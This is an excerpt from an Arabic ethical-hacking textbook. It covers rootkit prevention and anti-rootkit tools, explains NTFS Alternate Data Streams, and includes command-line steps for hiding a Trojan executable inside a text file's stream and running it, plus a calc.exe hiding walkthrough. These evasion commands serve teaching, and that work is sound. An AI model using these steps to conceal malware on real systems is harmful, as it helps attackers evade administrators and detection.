‫ﯾﺟب ﻋدم ﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻏﯾر اﻟﺿرورﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك وأﯾﺿﺎ ﺗﻌطﯾل اﻟﻣﯾزات واﻟﺧدﻣﺎت اﻟﺗﻲ ﻟﯾس ﻟﮭﺎ اﺳﺗﺧدام‪.‬‬ ‫‪-‬‬
‫ﯾﺟب اﻟﺗﺣﻘﻖ ﻣن ﺳﻼﻣﺔ ﻣﻠﻔﺎت اﻟﻧظﺎم ﺑﺷﻛل ﻣﻧﺗظم ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر اﻟﺑﺻﻣﺔ اﻟرﻗﻣﯾﺔ اﻟﻘوى‪.‬‬ ‫‪-‬‬
‫اﻟﺗﺄﻛد ﻣن أن ﺑرﻧﺎﻣﺞ اﻟﺣﻣﺎﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت اﻟذي ﺗم اﺧﺗﯾﺎره ﺗﻣﺗﻠك ﺣﻣﺎﯾﺔ ﺿد اﻟروت ﻛت ﻗﺑل ﺗﺛﺑﯾﺗﮫ‪.‬‬ ‫‪-‬‬
‫ﯾﺟب ﺗﺟﻧب ﺗﺳﺟﯾل اﻟدﺧول ﺑﺣﺳﺎب ﻟﮫ اﻣﺗﯾﺎزات إدارﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﯾﻧﺑﻐﻲ اﻟﺗﻣﺳك ﺑﻣﺑدأ اﻻﻣﺗﯾﺎزات اﻷﻗل‪.‬‬ ‫‪-‬‬

‫أدوات ﻣﺛل ‪ ،Vice ،Rootkit Revealer‬و‪F-Secure’s Backlight‬ھﻲ ﺑﻌض اﻟﺧﯾﺎرات اﻟﻛﺑﯾرة اﻟﺣر ﻟﻠﻛﺷف ﻋن وﺟود اﻟﻣﻠﻔﺎت‬
‫واﻟروت ﻛت اﻟﺧﻔﯾﺔ‪ .‬ﻟﻸﺳف‪ ،‬ﺑﻣﺟرد ﺗﺛﺑﯾت اﻟروت ﻛت‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أن ﯾﻛون ﻣن اﻟﺻﻌب ﺟدا إزاﻟﺗﮫ‪ ،‬أو ﻋﻠﻰ اﻷﻗل إزاﻟﺔ ﺗﻣﺎﻣﺎ‪ .‬ﻓﻲ ﺑﻌض‬
‫اﻷﺣﯾﺎن‪ ،‬ﻹزاﻟﺔ اﻟروت ﻛت ﯾﺗطﻠب ﻣﻧك ﺗﺷﻐﯾل اﻟﺟﮭﺎز ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل أﺧر ﻣﻘﺎرن و‪ mount‬ﻗرص اﻟﺻﻠب اﻷﺻﻠﻲ‪ .‬ﺑواﺳطﺔ‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪447‬‬

‫إﻋﺎدة ﺗﺷﻐﯾل ﺟﮭﺎزك إﻟﻰ ﻧظﺎم ﺗﺷﻐﯾل اﻟﺑدﯾل أو ﺗرﻛﯾب ﻣﺣرك اﻷﻗراص إﻟﻰ ﺟﮭﺎز آﺧر‪ ،‬ﯾﻣﻛﻧك ﻓﺣص ﻣﺣرك اﻷﻗراص أﻛﺛر ﺷﻣوﻻ‪ .‬ﻷن‬
‫ﻧظﺎم اﻟﺗﺷﻐﯾل اﻷﺻﻠﻲ ﻟن ﯾﻛون ﻗﯾد اﻟﺗﺷﻐﯾل وأﯾﺿﺎ ﻋﻣﻠﯾﺔ اﻟﻔﺣص ﻟن ﯾﺗطﻠب اﺳﺗدﻋﺎء ‪ API‬ﻣن اﻟﻧظﺎم اﻟﻣﺻﺎب‪ ،‬ﻓﻣن اﻷرﺟﺢ أﻧك ﺳوف‬
‫ﺗﻛون ﻗﺎدرة ﻋﻠﻰ اﻛﺗﺷﺎف وإزاﻟﺔ اﻟروت ﻛت‪ .‬ﺣﺗﻰ ﻣﻊ ﻛل ھذا‪ ،‬ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﻓﺎن أﻓﺿل ﺷﻲء ﺣﺗﻰ ﻣﻊ ﻓﺣص اﻟﻧظﺎم ھو ﺑﺑﺳﺎطﺔ‪،‬‬
‫اﻟﻔرﻣﺗﺔ ﺑﺷﻛل ﻛﺎﻣل‪ ،‬واﻟﺑدء ﻣن ﺟدﯾد‪.‬‬

‫‪Anti-Rootkit: Stinger‬‬
‫اﻟﻣﺻدر‪http://www.mcafee.com/us :‬‬
‫‪ McAfee Stinger‬ﯾﺳﺎﻋدك ﻋﻠﻰ اﻛﺗﺷﺎف وإزاﻟﺔ اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ذات اﻻﻧﺗﺷﺎر ‪ ،‬واﻟﻔﯾروﺳﺎت‪ ،‬واﻟﺗﮭدﯾدات اﻟﻣﺣددة ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص‬
‫ﺑك‪ Stinger .‬ﯾﻘوم ﺑﻔﺣص اﻟروت ﻛت‪ ،‬واﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ‪ ،‬وﺣدات ﺗﺣﻣﯾل‪ ،‬اﻟﺗﺳﺟﯾل‪ ،‬ودﻟﯾل اﻟﻣواﻗﻊ اﻟﻣﻌروﻓﺔ ﻻﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﺑراﻣﺞ‬
‫اﻟﺿﺎرة ﻋﻠﻰ اﻟﺟﮭﺎز ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟﺣد اﻷدﻧﻰ ﻣن ﻣرات اﻟﻔﺣص‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ إﺻﻼح اﻟﻣﻠﻔﺎت اﻟﻣﺻﺎﺑﺔ اﻟﺗﻲ وﺟدت ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص‬
‫ﺑك‪ .‬ﯾﻛﺷف وﯾﻌطل ﻛل اﻟﻔﯾروﺳﺎت ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬

‫‪Anti-Rootkit: UnHackMe‬‬
‫اﻟﻣﺻدر‪http://www.greatis.com :‬‬
‫‪ UnHackMe‬ھو ﻓﻲ اﻷﺳﺎس ﺑرﻧﺎﻣﺞ ﻟﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت واﻟذى ﯾﺳﺎﻋدك ﻓﻲ ﺗﺣدﯾد وإزاﻟﺔ ﺟﻣﯾﻊ أﻧواع اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل اﻟروت ﻛت ‪،‬‬
‫واﻟﺗرواﺟن‪ ،‬و‪ ،worms‬واﻟﻔﯾروﺳﺎت‪ ،‬وھﻠم ﺟرا‪ .‬اﻟﻐرض اﻟرﺋﯾﺳﻲ ﻣن ‪ UnHackMe‬ھو ﻣﻧﻊ اﻟروت ﻛت ﻣن إﯾذاء ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‬
‫اﻟﺧﺎص ﺑك‪ ،‬ﻣﻣﺎ ﯾﺳﺎﻋد اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺣﻣﺎﯾﺔ أﻧﻔﺳﮭم ﺿد اﻟﺗﺳﻠل وﺳرﻗﺔ اﻟﺑﯾﺎﻧﺎت‪ .‬ﯾﺗﺿﻣن ‪ UnHackMe‬أﯾﺿﺎ ﻣﯾزة ‪،Reanimator‬‬
‫واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺟراء ﻓﺣص ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻛﺎﻣﻼ‪.‬‬
‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬دﻗﺔ اﻟﻔﺣص اﻟﻣزدوج ﻟﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﯾﺳﺗﻧد إﻟﻰ ‪.Windows‬‬
‫‪ -‬ﺗﺗﺑﻊ اﻟﺷﯾﻔرات اﻟﺧﺑﯾﺛﺔ ﻓﻲ اﻟﻧظﺎم )اﻟروت ﻛت‪ ،‬واﻟﺗرواﺟن‪ ،‬و‪ ،worms‬واﻟﻔﯾروﺳﺎت‪ ،‬وھﻠم ﺟرا(‬
‫‪ -‬ﻻ ﯾﺑطﺊ اﻟﻛﻣﺑﯾوﺗر وأﻧﮫ ﻣﺗواﻓﻖ ﻣﻊ ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪448‬‬

‫‪Anti-Rootkit: Other Tools‬‬


‫ﺗطﺑﯾﻘﺎت ﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت اﻟﺗﺎﻟﯾﺔ ﺗﺳﺎﻋدك ﻋﻠﻰ إزاﻟﺔ اﻷﻧواع اﻟﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل اﻟروت ﻛت‪ ،‬واﻟﻔﯾروﺳﺎت‪ ،‬طروادة‪،‬‬
‫واﻟدﯾدان ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﯾﻣﻛﻧك ﺗﺣﻣﯾل أو ﺷراء ﺑرﻧﺎﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت ﻣن ﻣواﻗﻊ اﻟداﺧل وﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص‬
‫ﺑك ﻟﻠﺣﻣﺎﯾﺔ ﻣن اﻟروت ﻛت‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺗطﺑﯾﻘﺎت ﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Virus Removal Tool available at http://www.sophos.com‬‬
‫‪Hypersight Rootkit Detector available at http://northsecuritylabs.blogspot.com/‬‬
‫‪Avira Free Antivirus Tool available at http://www.avira.com‬‬
‫‪SanityCheck available at http://www.resplendence.com‬‬
‫‪GMER available at http://www.gmer.net‬‬
‫‪Rootkit Buster available at http://downloadcenter.trendmicro.com‬‬
‫‪Rootkit Razor available at http://www.tizersecure.com‬‬
‫‪RemoveAny available at http://www.free-anti-spy.com‬‬
‫‪TDSSKiller available at http://support.kaspersky.com‬‬
‫‪Prevx available at http://www.prevx.com‬‬

‫‪NTFS Data Stream‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ﺳﻣﺎت اﻟﻣﻠف)‪ ، (File attribute‬ﻛل ﻣﻠف ﻣﺧزﻧﺔ ﻋﻠﻰ وﺣدة ﺗﺧزﯾن ‪ NTFS‬ﯾﺣﺗوي ﻋﺎدة ﻋﻠﻰ اﺛﻧﯾن ﻣن ﺗدﻓﻘﺎت اﻟﺑﯾﺎﻧﺎت‬
‫اﻷﺳﺎﺳﯾﺔ )‪ .(Data Stream‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻷوﻟﻰ ﯾﻘوم ﺑﺗﺧزﯾن واﺻﻔﺎت اﻷﻣﺎن)‪ ، (security descriptor‬ودﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺛﺎﻧﻲ ﯾﻘوم‬
‫ﺑﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت داﺧل اﻟﻣﻠﻔﺎت‪ .‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )]‪ (Alternate Data Stream [ADS‬ھﻲ ﻧوع آﺧر ﻣن دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﻣذﻛورة‬
‫واﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون ﻣوﺟودة ﻓﻲ ﻛل ﻣﻠف‪.‬‬
‫ﯾدﻋم ﻧظﺎم اﻟﻣﻠﻔﺎت ‪ NTFS‬ﻣﺎ ﯾﺳﻣﻰ ﺑـ ‪ Alternate Data Stream‬أو ‪.ADS‬‬
‫إﻧﺷﺎء اﻟـ ‪ ADS‬ﺟﺎء ﻟﯾﺣل ﻣﺷﻛﻠﺔ ﺣﺎﺟﺔ ﺑﻌض اﻟﺑراﻣﺞ إﻟﻰ رﺑط ﻣﻌﻠوﻣﺎت ﻣﻊ ﻣﻠف ﻣﻌﯾن ﺑﺣﯾث ﯾﺗم ھذا اﻟرﺑط ﺑﺷﻛل ‪ Transparent‬ﺑﺎﻟﻧﺳﺑﺔ‬
‫ﻟﻣﺳﺗﺧدﻣﻲ اﻟﻣﻠف )ﺑراﻣﺞ أو ﻣﺳﺗﺧدﻣﯾن‪ (.‬وأﯾﺿﺎ ﻻ ﯾﻐﯾّر ھذا اﻟرﺑط ﻣن ﺣﺟم اﻟﻣﻠف‪.‬‬
‫ﯾﺗم اﺳﺗﺧداﻣﮭﺎ أﯾﺿﺎ ﻟﺗواﻓﻖ اﻟوﯾﻧدوز ﻣﻊ ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﻘدﯾم ‪ HFS‬اﻟﺧﺎص ﺑﻣﺎﻛﻧﺗوش ﺣﯾث ﯾﺗم اﺳﺗﺧدام ﻣﻔﮭوم ﻣﻣﺎﺛل ﻓﻲ اﻟﻣﺎﻛﻧﺗوش ﺣﯾث‬
‫ﯾﺳﻣﻰ ھﻧﺎ ‪ Resource Forks‬وﺗﺳﺗﺧدم ﻓﻲ ﻣﺎﻛﻧﺗوش ﻟﺗﺧزﯾن أﯾﻘوﻧﺔ اﻟﻣﻠف ﻣﺛﻼ وﺷﻛل اﻟﻧﺎﻓذة‪ ،‬وأﯾﺿﺎ ﻟرﺑط اﻟﻣﻠف ﻣﻊ ﺑرﻧﺎﻣﺞ ﻣﻌﯾن )ﻓﻲ‬
‫وﯾﻧدوز ﯾﺗم ھذا اﻟرﺑط ﻣن ﺧﻼل ﻻﺣﻘﺔ اﻟﻣﻠف(‪.‬‬
‫ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان أي اﻟﻣﻠف ﻓﻲ ﻧظﺎم ‪ NTFS‬ﻣؤﻟف ﻣن اﺛﻧﯾن ﻣن ‪ Stream‬اﻷﺳﺎﺳﯾﯾن وﻟﻛن ﯾوﺟد ﺗدﻓﻘﺎت أﺧرى )‪ .(stream‬وﻟﻛل‬
‫‪ Stream‬ﻣﺟﻣوﻋﺔ ﻣن اﻟﺧﺻﺎﺋص ﻟﺗوﺻﯾف ھذه اﻟـ ‪ .Stream‬ﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪449‬‬

‫ﻟﻠـ ‪ Stream‬ﯾوﺟد اﺳم ﻣﻣﯾز ﻟﮫ‪ .‬واﻟـ ‪ Stream‬اﻻﻓﺗراﺿﯾﺔ ﺗﻛون ﺑدون اﺳم )‪ null‬ﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺳﺎﺑﻘﺔ(‪.‬‬
‫ﻻﺳﺗﺧدام ‪ Stream‬أﺧرى ﯾﺗم إﻟﺣﺎق اﺳم اﻟـ ‪ Stream‬ﺑﻌد اﺳم اﻟﻣﻠف وﺑﻌد ﻧﻘطﺗﯾن”‪. “:‬‬
‫ﻣﺛﺎل‪:‬‬
‫‪D:\test.txt‬‬ ‫‪=> Default Stream here‬‬
‫‪D:\test.txt:OPS => Stream called OPS‬‬
‫ﻣﺳﺗﻌرض اﻟوﯾﻧدوز ‪ Explorer‬ﻻ ﯾﻌرض اﻟـ ‪ Streams‬ﻟﻣﻠف ﻣﺎ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﻣﻛن اﺧﻔﺎء ﻣﻌﻠوﻣﺔ ﻣﺎ ﺿﻣن ﻣﻠف ﻣﺎ ﺑﺣﯾث ﻻ ﯾﻣﻛن أن ﯾظﮭره‬
‫ﻣﺳﺗﻌرض وﯾﻧدوز‪.‬‬
‫ﻣﺛﺎل‪:‬‬
‫‪D:\> echo mypasword > passwords.txt:email‬‬
‫طﺑﻌﺎ إذا ﺗم ﻓﺗﺢ اﻟﻣﻠف ‪ passwords.txt‬ﺑﺷﻛل ﻋﺎدي ﻓﺳوف ﯾﺗم اﺳﺗﺧدام اﻟـ ‪ Stream‬اﻻﻓﺗراﺿﯾﺔ وﻟن ﯾﺗم إظﮭﺎر ﻣﺎ ﺗم إﺧﻔﺎءه ﺿﻣن اﻟـ‬
‫‪stream‬اﻟﺗﻲ أﻧﺷﺄﻧﺎھﺎ ھﻧﺎ‪. email‬‬
‫ﻹظﮭﺎر اﻟﻣﺣﺗوى )ﻣﺛﻼ(‪:‬‬
‫‪D:\> more < passwords.txt:email‬‬
‫‪mypasword‬‬
‫دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )]‪ (Alternate Data Stream [ADS‬ھو أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﻣﻛن ﺗرﻛﯾﺑﮭﺎ ﻋﻠﻰ اﻟﻣﻠف وﻟﻛن ﻟﯾﺳت ﻓﻲ‪/‬داﺧل‬
‫اﻟﻣﻠف ﻋﻠﻰ ﻧظﺎم ‪ .NTFS‬ﺟدول اﻟﻣﻠﻔﺎت اﻟرﺋﯾﺳﯾﺔ )‪ (Master File Table‬اﻟﺧﺎص ﺑﻛل ﺑﺎرﺗﺷن ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ‬
‫ﯾﺣﺗوﯾﮭﺎ اﻟﻣﻠف‪ ،‬وﻣوﻗﻌﮭﺎ اﻟﻔﻌﻠﻲ ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ﻟذﻟك‪ ،‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )‪ (ADS‬ﻟﯾﺳت ﻣوﺟودة ﻓﻲ اﻟﻣﻠف‪ ،‬وﻟﻛن ﻣﺗﺻﻠﺔ ﺑﮫ وذﻟك‬
‫ﻣن ﺧﻼل ﺟدول اﻟﻣﻠف‪ .‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )]‪ (Alternate Data Stream [ADS‬ھو ﺟزء ﻣﺧﻔﻰ ﻓﻲ اﻟوﯾﻧدوز واﻟذي ﯾﺣﺗوي ﻋﻠﻰ‬
‫اﻟﺑﯾﺎﻧﺎت اﻟوﺻﻔﯾﺔ ﻟﻠﻣﻠف ﻣﺛل اﻟﺻﻔﺎت)‪ ،(Attribute‬ﻋدد اﻟﻛﻠﻣﺎت‪ ،‬اﺳم اﻟﻣؤﻟف‪ ،‬وﺑﯾﺎﻧﺎت اﻟوﺻول ووﻗت اﻟﺗﻌدﯾل ﻣن اﻟﻣﻠﻔﺎت‪.‬‬
‫ﯾﻣﻛن ﻣﺛﻼ اﻻﺳﺗﻔﺎدة ﻣن ‪ ADS‬ﻟﺗﺗﺑﻊ ﺣﺎﻟﺔ اﻟﻣﻠف ﻣﺛﻼ ﺣﺟﻣﮫ )ﻛﻣﺎ ﻓﻲ ﺑﻌض طرق اﻟﺣﻣﺎﯾﺔ‪ ،‬ﺣﯾث إذا ﺗﻐﯾّر ﺣﺟم ﻣﻠف ﺗﻧﻔﯾذي ﯾﻣﻛن اﻋﺗﺑﺎره ﻗد‬
‫أﺻﯾب ﺑﻔﯾروس( وﺑﺎﻟﺗﺎﻟﻲ ﺑدﻻ ﻣن إﻧﺷﺎء ﻗﺎﻋدة ﻣﻌﯾطﺎت ﺿﺧﻣﺔ ﻟﻛل ﻣﻠف ﻣوﺟود ﻋﻠﻰ اﻟﺟﮭﺎز ﯾﻣﻛن وﺿﻊ ھذه اﻟﻣﻌﻠوﻣﺎت ﻋﻧد ﻛل ﻣﻠف‪.‬‬
‫‪ ADS‬ﻟﮫ اﻟﻣﻘدرة ﻋﻠﻰ ﺗﻔرﯾﻖ اﻟﺑﯾﺎﻧﺎت إﻟﻰ اﻟﻣﻠﻔﺎت اﻟﻣوﺟودة دون ﺗﻐﯾﯾر أو ﺗﻐﯾﯾر وظﺎﺋﻔﮭﺎ‪ ،‬وﺣﺟﻣﮭﺎ‪ ،‬أو ﻋرﺿﮭﺎ ﻷداة ﻣﺗﺻﻔﺢ اﻟﻣﻠﻔﺎت‪.‬‬
‫‪ ADSs‬ﯾﻘدم ﻟﻠﻣﮭﺎﺟﻣﯾن طرﯾﻘﺔ ﯾﺧﺑﺊ ﺑﮭﺎ ‪ rootkits‬أو أدوات اﻟﻘراﺻﻧﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺧﺗرق واﻟﺳﻣﺎح ﻟﮭم ﻟﯾﺗم ﺗﻧﻔﯾذھﺎ دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ‬
‫ﻣن ﻗﺑل ﻣﺳؤول اﻟﻧظﺎم‪ .‬اﻟﻣﻠﻔﺎت ﻣﻊ ‪ ADS‬ﻣن اﻟﻣﺳﺗﺣﯾل أن ﯾﺗم اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ﺗﺻﻔﺢ اﻟﻣﻠف اﻷﺻﻠﻲ ﻣﺛل ﺳطر اﻷواﻣر‬
‫)‪ (Command Line‬أو ﻣﺗﺻﻔﺢ ﻣﻠﻔﺎت اﻟوﯾﻧدوز )‪ .(Windows Explorer‬ﺑﻌد إرﻓﺎق‪/‬رﺑط ﻣﻠف ‪ ADS‬إﻟﻰ اﻟﻣﻠف اﻷﺻﻠﻲ‪ ،‬ﻓﺎن ﺣﺟم‬
‫اﻟﻣﻠف ﺳوف ﯾظﮭر اﻟﺣﺟم اﻷﺻﻠﻲ ﻟﻠﻣﻠف ﻓﻘط ﺑﻐض اﻟﻧظر ﻋن ﺣﺟم ‪ .ADS anyfile.exe‬اﻟﻣؤﺷر اﻟوﺣﯾد اﻟذي ﺗﻌﺑر اﻧﮫ ﺗم ﺗﻐﯾﯾر اﻟﻣﻠف ھو‬
‫ﺗﻌدﯾل اﻟطﺎﺑﻊ اﻟزﻣﻧﻲ)‪ ،(TimeStamp‬اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون ﻏﯾر ﺿﺎرة ﻧﺳﺑﯾﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


450

‫؟‬NTFS Stream ‫ﻛﯾﻔﯾﺔ اﻧﺷﺎء‬


:‫ وذﻟك ﻣن ﺧﻼل اﺗﺑﺎع اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‬NTFS Stream ‫ﯾﻣﻛن اﻧﺷﺎء‬
c:\>notepad myfile.txt:1ion.txt
.‫ أﺳطر ﻣن اﻟﺑﯾﺎﻧﺎت‬10 ‫(ﻹﻧﺷﺎء ﻣﻠف ﺟدﯾد وﻧﻛﺗب ﻓﯾﮫ‬Yes) ‫اﻧﻘر ﻓوق ﻧﻌم‬
.‫ﺛم ﻧﻘوم ﺑﺣﻔظ اﻟﻣﻠﻔﺎت‬
c:\>notepad myfile.txt:tiger.txt
.‫ ﺳطر ﻣن اﻟﺑﯾﺎﻧﺎت اﻻﺧرى‬20 ‫(ﻹﻧﺷﺎء ﻣﻠف ﺟدﯾد وﻧﻛﺗب ﻓﯾﮫ‬Yes) ‫اﻧﻘر ﻓوق ﻧﻌم‬
.‫ﺛم ﻧﻘوم ﺑﺣﻔظ اﻟﻣﻠﻔﺎت‬
.‫ ﺳوف ﺗﺟد اﻧﮫ ﺻﻔر‬myfile.txt ‫اذھب ﻟرؤﯾﺔ ﺣﺟم اﻟﻣﻠف‬
.Notepad ‫[ ﻓﻲ‬myfi1e.txt:tiger.txt] ‫ ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل ﻓﺗﺢ اﻟﻣﻠف‬Stream ‫ﻟﻠﺗﻌدﯾل ﻋﻠﻰ ﺑﯾﺎﻧﺎت‬

NTFS Stream Manipulation (Hiding Trojan in NTFS Stream)

:‫ ﻋن طرﯾﻖ ﺗﻧﻔﯾذ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‬NTFS Stream ‫ﯾﻣﻛﻧك ﻣﻌﺎﻟﺟﺔ‬

:(Stream) README.TXT ‫ إﻟﻰ‬Trojan.exe ‫ ﻟﻧﻘل ﻣﺣﺗوﯾﺎت‬-


c:\>type c:\Trojan.exe > c:\Readme.txt:Trojan.exe
:(Stream) README.TXT ‫ ﺑداﺧل‬Trojan.exe ‫ ﻟﺗﺷﻐﯾل اﻟﻣﻠف‬-
c:\>start c:\Readme.txt:Trojan.exe
:(Stream) README.TXT ‫ ﻣن‬Trojan.exe ‫ ﻻﺳﺗﺧراج ﻣﺣﺗوﯾﺎت‬-
c:\>cat c:\Readme.txt:Trojan.exe > Trojan.exe
. [Cat is a Windows 2003 Resource Kit Utility]:‫ﻣﻠﺣوظﮫ‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪451‬‬

‫‪Hiding Files Using NTFS Streams‬‬

‫ﻧﻔرض اﻧﻧﺎ ﻧرﯾد إﺧﻔﺎء ﻣﻠف ﻣﺎ ﺑواﺳطﺔ ‪ NTFS Stream‬وﻟﯾﻛن ﻣﺛﻼ ‪ calc.exe‬ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -1‬ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﯾﺳﻣﻰ ‪ magic‬ﻓﻲ اﻟﺑﺎرﺗﺷن \‪ C:‬ﺛم ﻧﻘوم ﺑﻧﺳﺦ اﻟﻣﻠف ‪ calc.exe‬اﻟﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر ‪C:\windows\system32‬‬
‫اﻟﻰ اﻟﻣﺟﻠد ‪.C:\magic‬‬
‫‪ -2‬ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر ‪ Command Prompt‬وﻣن ﺧﻼﻟﮫ ﻧﻘوم ﺑﺎﻟذھﺎب اﻟﻰ اﻟﻣﺟﻠد ‪ ،C:\magic‬ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑطﺑﺎﻋﺔ‬
‫اﻟﺳطر ‪ notepad readme.txt‬ﻓﻲ ﺳطر اﻷواﻣر ﺛم اﻟﻧﻘر ﻓوق ‪.Enter‬‬
‫‪ -3‬ھذا ﯾؤدى اﻟﻰ ظﮭور ﺑرﻧﺎﻣﺞ اﻟﻛﺗﺎﺑﺔ ‪ notepad‬ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻟﺳطر ‪ Hello world‬ﻓﯾﮫ ﺛم ﻏﻠﻖ وﺣﻔظ اﻟﻣﻠف‪.‬‬

‫‪ -4‬ﻧﻘوم ﺑﻣﻼﺣظﮫ ﺣﺟم اﻟﻣﻠف ‪ readme.txt‬ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻟﺳطر ‪ dir‬ﻓﻲ ﺳطر اﻷواﻣر ‪.Command Prompt‬‬
‫‪ -5‬ﻧذھب اﻻن اﻟﻰ إﺧﻔﺎء اﻟﻣﻠف ‪ calc.exe‬ﻓﻲ اﻟﻣﻠف ‪ readme.txt‬وذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ ﻓﻲ ﺳطر اﻷواﻣر ‪.cmd‬‬
‫‪C:\type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe‬‬

‫‪ -6‬ﺑﻌد اﺳﺗﺧدام ھذا اﻟﺳطر وﻣﻼﺣظﮫ اﻟﻣﺳﺎﺣﺔ اﻟﺟدﯾدة ﻟﻠﻣﻠف ‪ readme.txt‬ﻧﺟد اﻧﮭﺎ ﻟم ﺗﺗﻐﯾر‪.‬‬
‫‪ -7‬اﻻن ﯾﻣﻛﻧك ﺣذف اﻟﻣﻠف ‪ calc.exe‬ﻷﻧﻧﺎ ﻟم ﻧﻌد ﻓﻲ ﺣﺎﺟﮫ اﻟﯾﮫ ﺣﯾث ﻗﻣﻧﺎ ﻣن ﺧﻼل اﻟﺳطر اﻟﺳﺎﺑﻖ ﺑﺈﺧﻔﺎﺋﮫ ﻓﻲ اﻟﻣﻠف ‪.readme.txt‬‬
